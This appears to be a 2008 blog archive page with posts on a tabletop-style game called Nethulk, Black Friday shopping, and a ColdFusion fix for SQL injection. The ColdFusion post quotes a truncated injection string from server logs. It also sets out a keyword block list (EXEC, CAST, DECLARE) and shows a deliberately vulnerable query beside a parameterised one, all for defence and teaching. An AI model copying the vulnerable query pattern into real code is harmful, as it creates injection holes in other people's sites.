Upcoming Nethulk Release - 1.58

December 17th, 2008

Since writing some material for the Nethulk FAQ a few weeks ago, I’ve been afforded a sneak peek into an upcoming release of Nethulk, and this one is packed with new content. Amber, the creator of Nethulk, has been busy programming and playtesting since the 1.57 release. She has added an additional playable faction, the Invaders. They’re a cybernetic race with advanced technological abilities. Foremost among these is the ability to ‘summon’ units by playing cards similar to the psychic ability cards already in the game.

The Invaders are really something novel for the game, and I found them refreshing to play. Their leader unit uses the summoning abilities, and can summon whatever the player has drawn cards for and has the points to play. If that wasn’t unique enough, it can do this also by using ‘relays’, another type of unit that extends the summoning range of the leader. It can summon units to the relay, which is a highly mobile unit that can hide out and gather forces to whatever point on the map it can reach.

The Invaders aren’t the only new things coming with 1.58. Amber has also added additional high-point Valkyries: an elite force of 5 Valkyrie warriors worth 8 points each, all with unique and interesting abilities. I won’t spoil too much about the abilities, as Amber says she’s still working on game balance issues and that they may change before 1.58 is official.

Look for the release early in 2009; it’ll be well worth the wait.

ColdFusion trick for stopping SQL Injection

December 4th, 2008

A while back, there was an internet worm, or an extremely prodigious hacker, hacking sites through SQL injection to place links to a Chinese spam site. It was really frustrating, because it was targeting ColdFusion sites and we host a lot of those.

Here’s an example of how these attacks looked in the logfiles:

;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x…%20AS%20CHAR(4000));EXEC(@S);

Well, we ended up finding two lines to place into our Application.cfm files to stop it. Basically, it looks at the query string and aborts if it finds an EXEC or CAST in it. Simple and effective:

<!--- Abort the request if the script name, path info or query string contains "EXEC(" --->
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>

I paste that line in a few times and change “EXEC(” to “CAST(” and “DECLARE(”, and to anything else that happens to be something I’m not going to use and might be dangerous.

The real solution, of course, is to write good code. Use cfqueryparam with maxlength set. Best practices are something I can use when I code, but as we host code that our users write or download, it’s impossible for me to make sure all of their code is secure. I can, however, write a few lines into the top of their Application.cfm files to protect our SQL servers.
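
The cfqueryparam fix named above, shown beside the kind of query this attack relies on. This is an added example, not code from the original post; the datasource, table, column and URL parameter names are hypothetical.

```cfml
<!--- Added example; datasource, table, column and URL parameter names are hypothetical. --->

<!--- BEFORE (vulnerable): url.id is pasted into the SQL text, so anything that
      follows a legitimate number in the query string, such as the
      ";DECLARE @S ...;EXEC(@S);" seen in the logs, runs as extra statements. --->
<cfquery name="getArticle" datasource="#application.dsn#">
    SELECT id, title, body
    FROM articles
    WHERE id = #url.id#
</cfquery>

<!--- AFTER: each value is validated by cfqueryparam and sent as a bound parameter.
      A non-integer id or an over-long search term throws before any SQL is sent. --->
<cfparam name="url.id" default="0">
<cfparam name="url.q" default="">
<cftry>
    <cfquery name="getArticle" datasource="#application.dsn#">
        SELECT id, title, body
        FROM articles
        WHERE id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
    </cfquery>

    <!--- maxlength counts the whole bound value: 50 characters of input plus the two % wildcards. --->
    <cfquery name="searchArticles" datasource="#application.dsn#">
        SELECT id, title
        FROM articles
        WHERE title LIKE <cfqueryparam value="%#url.q#%" cfsqltype="cf_sql_varchar" maxlength="52">
    </cfquery>

    <cfcatch type="any">
        <!--- Any failure here, including a cfqueryparam validation error
              (wrong type or longer than maxlength), ends the request. --->
        <cfheader statuscode="400" statustext="Bad Request">
        <cfabort>
    </cfcatch>
</cftry>
```

With the bound form, the 4000-character string from the log excerpt fails the integer check on `url.id` and never reaches the database as SQL text.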

Long Thanksgiving Break - Black Friday Sales

December 1st, 2008

I’ve just gotten back from a long break for Thanksgiving, five days off from work. Of course, Black Friday doorbuster shopping is one of the traditions in my family. My mom and I do it every year. Where we live, there were no horrible tramplings like the Wal-Mart employee that died when customers broke down the doors and rushed the store. We had long lines, but it was courteous and friendly the whole way through. This year we hit the Belks doorbusters first, as they were giving away gift cards to the first 250 customers that came to the store. My mom and I both got five dollars. Not a lot, but last year they did the same thing and I ended up getting a $100 gift card, and bought most of my Christmas presents for others with it. It’s amazing how many thumbdrives and mp3 players you can get for that, and they make such great gifts.

Speaking of thumbdrives and memory cards and mp3 players, that’s what most of the stores that carried electronics seemed to be pushing this year. Cheap flash memory devices. It’s a shame I got those for everyone last year, so I can’t give them as gifts again so soon. I got a ton of them for myself though. My cell phone, my laptop, everything I own that takes flash memory or SD cards got a new card, most of them for five or ten dollars. I dub this the year of cheap flash.

Nethulk Missions - Escapes

November 27th, 2008

Mission 5

Mission 5 Map

In mission 5, five marines start in each of two deployment areas. Of the starting ten, five have to escape alive. It may sound easy, but there are long corridors and choke points that make this a very challenging map.

The blip faction may be played as orks or aliens, with any of the available starting configurations.

Nethulk Missions - Flame Outs

November 26th, 2008

Flame outs are about reaching an objective room and using a flame based weapon to burn all target squares. The blip faction tries to prevent the advancing troops from reaching this objective room, or to eliminate the flamers. The attacking team will lose if all of the flamers go down, or if they do not have enough flamer ammo to complete the mission.

Mission 1 Map

Mission 1 is a well balanced and quick flame-out mission, and can be an excellent first mission to try for new players. The typical point balance is 10 points for marines against a 2 exp blip alien. Game time is 10-15 minutes.

Variations include orks or ancients as the blip faction, with Valkyries available to stand in for the marines.

Added in 1.58 is an expanded selection of blips for the ork faction.

Skirmish 2 is longer than Mission 1 with a larger map that can lead to more varied strategies, but still has a single objective room. It’s suggested for players that are comfortable with the game and can turn quickly.

Mission 4 is a two-squad advance down a set of double hallways with two objective rooms at the end. Marines start with two squads, so 20 points for marines will yield two squads at mission one balance, matched for 3 exp or 2 max blips.
